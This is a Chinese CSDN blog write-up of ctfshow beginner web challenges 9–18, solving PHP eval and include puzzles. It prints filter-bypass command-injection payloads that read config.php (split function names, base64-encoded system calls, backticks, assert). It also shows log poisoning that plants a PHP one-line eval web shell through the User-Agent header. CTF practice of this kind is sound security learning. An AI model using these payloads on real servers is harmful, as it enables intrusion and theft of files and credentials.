ctfshow 做题 萌新 模块(4)

最新推荐文章于 2024-01-03 16:58:16 发布
最新推荐文章于 2024-01-03 16:58:16 发布
阅读量1.2k 收藏 5
点赞数 2
分类专栏: 做题 文章标签: ctfshow
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Goodric/article/details/120391073
版权

ctfshow 做题 萌新 模块(4)

——

web9

给出提示: flag in config.php
所以我们是需要得到 config.php 文件里的内容。
代码中有 preg_match 函数,一开始以为是对这些函数进行过滤,后面才发现 else 后面才是回显错误,所以是必须用上这些给出的函数。
请添加图片描述

传入

?c=highlight_file(‘config.php’);

?c=system(‘cat config.php’);

请添加图片描述

——
——

web10

这题就是不能使用给出的这些函数。
请添加图片描述

使用 highlight_file()函数的别名 show_source() 函数得到 flag 。

还可以使用拆分函数字符的方法:

?c=$a='sys';$b='tem';$d=$a.$b;$d('cat config.php');


c=$a='highligh';$b='t_file';$d=$a.$b;$d('config.php');

请添加图片描述

——
——

web11

这题还是不能用上给出的这些字符。
请添加图片描述

继续

?c=show_source(‘config.php’);

请添加图片描述

——
——

web12

被过滤的字符又变多了。
过滤了字符点,文件名的字符也被过滤了。
请添加图片描述

收集常用的命令执行函数:

system()
passthru()
exec()
shell_exec()
popen()
proc_open()
pcntl_exec()

这里用到一个反引号,就是先将命令中反引号的命令先执行,再执行整条命令的结果。
传入:
cat 字符中使用单引号或双引号或斜杆用于绕过 cat 被过滤。

?c=passthru("ca''t `ls`");

还有一个绕过过滤的方法,对被过滤的字符进行编码:

c=$a = base64_decode('c3lzdGVt');$b=base64_decode('Y2F0IGNvbmZpZy5waHA=');$a($b);

c3lzdGVt 是 system 的 base64 编码,Y2F0IGNvbmZpZy5waHA= 是 cat config.php 的 base64 编码。
请添加图片描述

——
——

web13

分号和字符 file 也被过滤了。
请添加图片描述

分号被过滤,我们无法对语句进行闭合了,选择用 ?> 对语句进行闭合。
前面一题的 payload :

?c=passthru("ca''t `ls`")?>

请添加图片描述

还可以用到一个函数 assert() ,
assert() 会检查指定的 assertion 并在结果为 FALSE 时采取适当的响应。如果 assertion 是字符串,它将会被 assert() 当做 PHP 代码来执行。

?c=assert(base64_decode(%27c3lzdGVtKCdjYXQgY29uZmlnLnBocCcp%27))?>

c3lzdGVtKCdjYXQgY29uZmlnLnBocCcp 是 system(‘config.php’) 的 base64 编码。

——
——

web14

多过滤了一个括号的字符,就不能用命令执行的方法了。
请添加图片描述

这里用 get 和 post 结合传入参数。
先 GET 传入

?c=echo `$_POST[1]`?>

再进行 POST 传入

1=cat config.php

请添加图片描述

然后在 F12 源码中得到 flag 。
感觉做法有点类似于文件上传,即先传入一个可操作的参数,再用这个参数执行命令。

请添加图片描述

——
——

web15

等号、尖括号、问号、星号也被过滤了,即不能用 ?> 代替分号,参数后面也不能用等号接传入的值。
不过分号可以使用了。
请添加图片描述

前一题的方法
get 传入:

?c=echo `$_POST[1]`;

post 传入:

1=cat config.php

请添加图片描述

——
——

web16

代码告诉我们传入参数 c 。
满足 md5(“ctfshow$c”)===“a6f57ae38a22448c2f07f3f95f49c84e”) 即可回显 flag 。
请添加图片描述

md5 解密得到: ctfshow36d
即 c 的值为 36d
请添加图片描述

传入
?c=36d
得到 flag 。
请添加图片描述

——
——

web17

看到 include() 函数,可以判断这题用到文件包含的方法。
请添加图片描述

这题用到日志注入的方法,前面做过一题 web 模块中的 web4 也是用日志注入的方法。
尝试访问日志文件:

?c=/var/log/nginx/access.log

看到成功回显,说明可以运用这个方法。
请添加图片描述

把 User-Agent 的值改为一句话木马:

<?php @eval($_POST['a']);?>

请添加图片描述

然后用蚁剑连接。
请添加图片描述

html 文件夹里有个 36d.php 文件,打开里面的内容为 flag 。
请添加图片描述

——
——

web18

额,多过滤了字符 file ,还是不影响用前面的方法。
不过应该有更简单的方法,只需要对参数 c 传入特定的值就能回显 flag 。(不知道文件包含中伪协议的方法可不可用)
请添加图片描述

先尝试 ?c=/var/log/nginx/access.log 有回显,抓包把 User-Agent 的值改为一句话木马,然后用蚁剑连接,打开文件 36d.php 得到 flag 。
请添加图片描述

Goodric
关注
  • 2
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
CTFSHOW web193 left标注盲注脚本
05-04
这段代码是一个用于获取某个网站的 flag 的脚本。它使用了 SQL 注入漏洞来获取 flag。具体来说,它通过构造 SQL 语句的方式,逐个字符地获取 flag。其中,它通过修改注入语句中的 payload 变量,来获取不同的信息,...
ctfshow web139命令盲注脚本
10-21
ctfshow靶场 web入门 web139 命令盲注脚本
CTFSHOW 萌新 部分wp
Je3Z的博客
06-03 582
给他 hao 开始以为是宽字节注入,然后发现不行,然后git泄露里的hint.php sprintf和addslashes有个漏洞,从WordPress SQLi谈PHP格式化字符串问题 ?name=1&pass=%1$' or 1%23 右键查看源码,提示flag位置 解码出来是flag.txt 是个文件包含漏洞,直接/flag不行,base64被禁了 然后用rot13 php://filter/read=string.rot13/resource=/flag ...
第1-63题总结:URL提交参数获取flag篇
分享简单的安全技术
05-10 3656
第一种:使用目录穿越方法,提交参数时输入:xxxx?/…/…/…/…/flag,利用?/将xxx文件失效,解析到flag所在文档,eg:第一题 第二种:使用filter协议读取文件,语句:php://filter/read=convert.base64-encode/resource=flag.php 第三种:执行ping命令时,使用|或;执行除ping命令外我们想要执行的命令 空格替换:采用$IPS$1代替空格 键字替换,cat /flag=a=g;cat$IFS$1fla$a 第四种:利用空格绕过WA
CTFSHOW命令执行做题总结(小白文章)
qq_62147945的博客
03-23 441
直接上聊天记录了由于我是一个小白,而且也是第一次写文章,第一次写总结,有的思路逻辑可能有错误,或者文章结构杂乱,佬们多多包涵就行了(狗头)。
ctfshow-萌新-web4( 利用逻辑运算符绕过获取网站敏感信息)
热门推荐
wangyuxiang946的博客
09-10 1万+
ctf.show萌新模块 web4,这一考察的是 intval()函数转换字符串的特性,以及SQL注入漏洞的绕过方式,源码中过滤了or,加减乘除(+-*/),左右移,括号,|,select等键字,我们使用短路逻辑或(||)来替替代or 即可 页面中展示了部分源码,提示我们 id=1000 时,即可获取flag 首先分析一下思路,源码中过滤了参数中的 or - / * < > ! ( ) + select 等键字,所以我们的参数中不能包含这些键字,否则会直接 d...
ctfshow php特性解题思路及答案 新手视角
最新发布
2301_78362619的博客
01-03 970
新手看得懂 学得会
CTFSHOW web183 正则爆破脚本
10-21
CTFSHOW web183 正则爆破脚本
ctfshow web214 时间盲注标准脚本
10-21
ctfshow web214 时间盲注标准脚本
ctfshow web184 正则爆破脚本0x16进制
10-21
ctfshow web184 正则爆破脚本0x16进制
CTF show萌新题系列
12-22
题目地址:https://ctf.show 0X01 萌新_密码1 1.16进制转字符串 有很多网站可以实现,这里我也附上我的脚本: # author: 羽 def hex_to_str(): while True: s = input("输入要转成字符串的16进制(输入空字符串退出):") if s=='': break k='' try: for i in range(0,len(s),2): j = s[i]+s[i+1]
ctfshow web入门---文件执行 解题思路
qq_73767109的博客
04-20 786
ctfshow web入门(web29-web59)解题思路与方法
震惊!!! ctfshow解题思路
2301_78362619的博客
12-18 1622
搞渗透的流程 学习渗透 能够让你看得懂 一步一步的往上走
ctfshow 萌新web系列--1
qq_61632010的博客
08-25 725
打开靶机 <html> <head> <title>ctf.show萌新计划web1</title> <meta charset="utf-8"> </head> <body> <?php # 包含数据库连接文件 include("config.php"); # 判断get提交的参数id...
CTFshow web4 详解
lzu_lfl的博客
10-15 2233
日志写码getshell
cftshow web学习记录(二)
weixin_52555162的博客
02-24 981
萌新计划,这次更新web16-21 web16: 审计代码发现我们只要满足: if(md5("ctfshow$c")==="a6f57ae38a22448c2f07f3f95f49c84e"){ echo $flag; 满足这一句的条件就可以: 先来看看mad5函数的作用: 这个函数使用来计算字符的MD5散列,他可以选择十六进制或者二进制输出格式 分析if(md5("ctfshow$c")==="a6f57ae38a22448c2f07f3f95f49c8..
CTFshow_萌新--密码篇
weixin_45908624的博客
02-02 1236
ctfshow_萌新 密码篇
某RSA
YUK_103的博客
03-02 842
题目如下所示: from Crypto.Util.number import getPrime,bytes_to_long from sympy import Derivative from fractions import Fraction from secret import flag p=getPrime(1024) q=getPrime(1024) e=65537 n=p*q z=Fra...
CTFshow解谜题-萌新-密码1
qq_53460781的博客
01-29 483
CTFshow解密
ctfshow web2萌新
09-03
ctfshow萌新中的web2卡使用了intval()函数强制将参数转换为数值型,但通过使用特殊字符和运算符,我们可以绕过过滤,控制SQL查询的结果,从而获取flag。在这个卡中,or被过滤,但我们可以使用加号、减号、乘号、...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Goodric

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值